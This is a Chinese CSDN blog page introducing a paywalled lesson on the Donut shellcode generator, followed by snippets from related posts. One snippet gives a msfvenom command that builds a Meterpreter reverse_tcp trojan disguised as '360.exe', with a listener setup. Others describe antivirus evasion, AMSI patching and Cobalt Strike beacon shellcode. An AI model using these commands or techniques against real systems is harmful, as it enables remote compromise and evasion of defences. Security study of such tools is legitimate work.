第18节 神级开源shellcode工具:donut

已于 2024-05-17 09:50:49 修改
阅读量1.7k 收藏 9
点赞数 14
分类专栏: shellcode入门与实战 文章标签: shellcode donut 网络安全 系统安全 c语言 c++
于 2024-05-15 10:38:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Qyears/article/details/138896556
版权
本文详细介绍了Donut,一个强大的开源Shellcode生成器,它能够将PE文件、.NET程序集、脚本转换为Shellcode。文章涵盖了Donut的特性、编译过程、功能测试,包括各种类型的文件转换,并讨论了其在集成开发中的应用及可能遇到的问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

我是一枚从事网络安全行业十余年的小师哥🫡,做过红队技术支持,也做过技术开发leader,乐于分享技术,喜欢结交朋友。

  • 这是我做的一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴,属于实战、经验性内容,里面的每一个操作我都亲测过。
  • 本专栏内容也有对应的视频版课程▶️,需要看视频版的小伙伴可以私信我get折扣券(@imbyter)

目录

一、Donut是什么​

 二、Donut的特点​

三、功能参数解读​

四、Donut的编译​

1. 将CMD设置为VS的x86编译环境变量​

2. 编译源码获得loader_exe_x86.h文件​

五、将CMD设置为VS的x64编译环境变量​

编译源码获得最终文件​

六、功能场景测试​

1. 将原生exe转为shellcode​

2. 将原生dll转为shellcode​

3. 将.net exe转为shellcode​

4. 将.net dll转为shellcode​

5. 远程加载shellcode​

6. 将vbs/js/xsl转为shellcode​

7. shellcode加载器​

七、集成开发​

如何使用donut.dll文件​

八、存在问题​

1. 不支持转换的情况​

2. 兼容性存在的问题​

九、代码附件​

对4.1测试exe源码​

对4.2测试dll源码​

对4.3测试.net exe源码​

对4.4测试.net dll源码​

对4.7shellcode加载器源码​

十、参考资料​

一、Donut是什么

Donut是一款shellcode生成器,可将C/C++、C#生成的PE文件转换为shellcode文件,同时支持JS、XSL、VBS脚本转换为shellcode。 Donut生成的shellcode可以从HTTP服务器上加载,也可以从本地加载。生成的shellcode模块支持128位比特随机密钥加密

了解本专栏 订阅专栏 解锁全文 超级会员免费看
探索SimpleShellcode:一款轻巧实用的shellcode生成器
gitblog_00003的博客
04-02 773
探索SimpleShellcode:一款轻巧实用的shellcode生成器 去发现同类优质开源项目:https://gitcode.com/ 在网络安全领域,shellcode是一种特殊形式的机器代码,用于在目标系统上执行攻击者指定的操作。是一个简洁且易于使用的工具,它可以帮助开发者和安全研究人员快速生成自定义的shellcode。本文将深入探讨该项目的技术细、应用场景以及其独特的优点。 项目简...
开发知识点-dotnet/.Net+C#/CSharp
aming小老弟
07-01 2024
NET(读作"dot net")是由微软公司开发的一种广泛使用的软件开发平台。它提供了一个统一的编程模型,用于构建各种类型的应用程序,包括桌面应用、Web 应用、移动应用和云服务。.NET 平台包括一系列的工具、库和语言,其中最常用的编程语言包括C#、VB.NET 和 F#。这些语言可以与.NET提供的大型类库结合使用,以实现各种功能,如数据访问、GUI开发、安全性、网络通信等。
使用 donut 将 exe 转成 shellcode
hambaga的博客
01-19 5760
donut可以将C语言编写的EXE 转成shellcode,免杀shellcode比免杀exe简单得多。 donut 可以在github上下载,下面直接给出命令,将一个32位EXE转成shellcode。 .\donut -f .\Sharphound.exe -a1 具体参数请看文档。执行该命令会得到一个payload.bin,是二进制shellcode,你可以写一个程序把它转成C语言的数组,在程序中调用就行了。 ...
donut:生成x86,x64或AMD64 + x86位置无关的shellcode,该shellcode从内存中加载.NET程序集,PE文件和其他Windows有效负载,并使用参数运行它们
04-29
当前版本: 请提交有关v1.0版本的问题和要求 目录 用甜甜圈开发 问题与讨论 免责声明 1.简介 Donut是与位置无关的代码,可在内存中执行VBScript,JScript,EXE,DLL文件和dotNET程序集。 Donut创建的模块既可以从HTTP服务器进行登台,也可以直接嵌入到加载程序本身中。 可以选择使用Chaskey块密码和128位随机生成的密钥对模块进行加密。 文件加载并在内存中执行后,原始引用将被删除以阻止内存扫描程序。 生成器和加载器支持以下功能: 使用aPLib和LZNT1,Xpress,Xpress Huffman通过RtlCompressBuffer压缩输入文件。 将熵用于API哈希和字符串生成。 文件的128位对称加密。 修补反恶意软件扫描接口(AMSI)和Windows锁定策略(WLDP)。 修补EXE文件的命令行。 修补与出口相关的API,以避
一款开源ShellCode生成引擎
11-29
1.本工具只支持x86 coff格式的文件 2.全局变量记得初始化,测试的时候发现有事全局变量没有初始化会获取不到 3.关闭MSVC的全局优化,开启全局优化时OBJ中的信息无法获取 4.不要在代码中使用c++一些特性,类似异常等,测试类时发现基本的类是可以满足的不要使用c++的一些库,切记
ShellCode生成器
Rare's Tech-Blog
08-19 6204
http://hi.baidu.com/olhack/blog/item/4eaad7b4132c15738ad4b2f6.html 黑防以前N多的文章已经介绍了ShellCode的编写,所以关于ShellCode的编写不是本文的目的。一般情况下,我们都是用汇编写好实现ShellCode功能的汇编代码,然后再提取16进制,那怎么提取呢?有人说用VC反汇编后,可以得到
我的Shellcode生成器
http://www.cppx.net
03-11 1724
这个shellcode 生成器根据《网络渗透技术》中所带的示例改写,通过溢出堆栈缓冲区获得执行权限以后,将打开一个端口监听连接,创建一个新的进程运行cmd.exe,并把输入输出重定向到连接套接字,黑客通过客户端程序登录监听端口即可获得远程主机shell。/* shellcode_port_bind.c**  《网络渗透技术》演示程序*  作者:san, alert7, eyas, wate
python执行shellcode_【Python】shellcode压栈指令生成工具
weixin_39590453的博客
12-03 166
#/usr/bin/env python# -*- coding: UTF-8 -*-'''写shellcode时压栈指令生成工具2013-2-26By Terry'''import binasciiif __name__ == '__main__':while True:string = raw_input("\nInput a String:")string_len = len(string)...
Shellme:快速Shellcode生成器指南
gitblog_00613的博客
09-01 428
Shellme:快速Shellcode生成器指南 项目地址:https://gitcode.com/gh_mirrors/sh/shellme 一、项目目录结构及介绍 Shellme项目提供了一个简单的命令行工具来生成Shellcode,简化了开发过程中对特定操作码的需求。下面是该开源项目的基本目录结构: shellme/ ├── LICENSE.md # 许可证文件,遵循MIT...
【Python】shellcode压栈指令生成工具
weixin_33940102的博客
03-16 168
shellcode时的压栈指令方法相信大家使用得不少,只要懂得程序在调用函数时参数进栈的特点便很容易明白。如果执行“net user user password /add&&net localgroup administrators user /add”这语句的话,要让大家逐个字母的进栈肯定会给效率打个大大的折扣,这过程没技术含量纯苦力活,像这类活应该交给...
shellcode_generator:shellcode,生成器,Visual Studio,C ++,Windows
03-09
shellcode_generator shellcode,生成器,Visual Studio,C ++,Windows
chiralium:Windows的Shellcode-to-binary生成器
05-08
手性 描述 只是一个简单的工具,可以使用Golang从shellcode生成二进制文件。 当然,您需要能够“构建”。 您也可以指定自己的shellcode或使用msfvenom即时生成一个抄表器reverse_https(x86或x64)。 为了避免静态shellcode的检测,shellcode使用AES加密存储(每次编译都会生成唯一的随机密钥/ iv),然后存储在go文件中,然后在执行时进行编译和解密。 还创建了metasploit的资源文件,因为我太懒了,无法手动运行它。 我不相信任何东西,只是使用了来自许多地方的东西,例如。 目前,您可以: 仅编译Windows Shellcode 针对x86或x64体系结构进行编译 使用syscall执行您的shellcode 该程序已在Linux(Debian)和python3上进行了测试。 安装 所需组件: 高朗 python3
shellcode转换工具
07-26
shellcode转换工具
shellcode
赵花花08042的博客
01-28 4259
https://www.bilibili.com/video/BV1y4411k7ch/?spm_id_from=333.788.recommend_more_video.3 什么是shellcode? 通常情况下,编写代码生成pe文件(即exe文件)(运行所需的宿主 意思就是,需要先运行exe) 而shellcode,不被包装在pe中,以二进制的方式存放到 举例:实现弹窗提示功能 编译后,运行生成的exe文件,弹出框 把代码中的核心代码MassegeBOX提取出来就是shellcode 通过特殊处
简单高效的Shellcode生成工具——Shellme
最新发布
gitblog_00445的博客
01-09 365
简单高效的Shellcode生成工具——Shellme shellme simple shellcode generator 项目地址: https://gitcode.com/gh_mirrors/sh/shellme ...
ShellcodeExec: 一个强大的Linux shellcode执行工具
gitblog_00019的博客
03-14 476
ShellcodeExec: 一个强大的Linux shellcode执行工具 去发现同类优质开源项目:https://gitcode.com/ ShellcodeExec是一个功能强大的Python脚本,用于在Linux系统中执行shellcode。它不仅可以帮助你更轻松地运行shellcode,而且还提供了许多高功能,如将shellcode注入到进程、生成PE文件等。 使用场景 Shellc...
CSSG:Cobalt Strike Shellcode生成工具
weixin_43977912的博客
01-24 3753
CSSG CSSG是一款功能强大的Cobalt Strike Shellcode生成工具。本质上来说,CSSG是一个具备攻击性的Python脚本,广大研究人员可以使用它来轻松生成并格式化信标Shellcode。 该工具支持生成无阶段信标Shellcode,并带有暴露的退出方法、额外的格式化、加密、编码、压缩和多行输出等功能。 注意:Shellcode的转换通常需要按菜单顺序降序执行。 执行要求 可选的AES加密选项使用/assets文件夹中的python脚本实现。 具体取决于要安装的pycryptodome
开源一个ShellCode生成框架
鬼手的博客
05-25 2949
文章目录前言项目预览项目配置文件命名与作用ShellCode大小的计算方法第一部分 ShellCode生成第二部分 ShellCode部分ShellCode加载器如何提取ShellCode如何扩展ShellCode框架?参考资料项目下载 前言 现阶段,shellcode编写门槛高,大多需要有较深的汇编功底,而Metersploit上的Shellcode开源生成框架,功能单一,扩展性差,大多只能在d...
简单的shellcode制作
renyizou的博客
06-16 334
一串机器能执行的代码 msfvenom msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.183.202 LPORT=4343 -f exe > 360.exe 生成一个名字叫360.exe的木马 此时还需要一个监听端--msf中的监听模块 use exploit/multi/handler 设置好lhost和lpost,记得设置payload,开启监听 运行木马 就能建立session,直接就进去了 linux ..
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值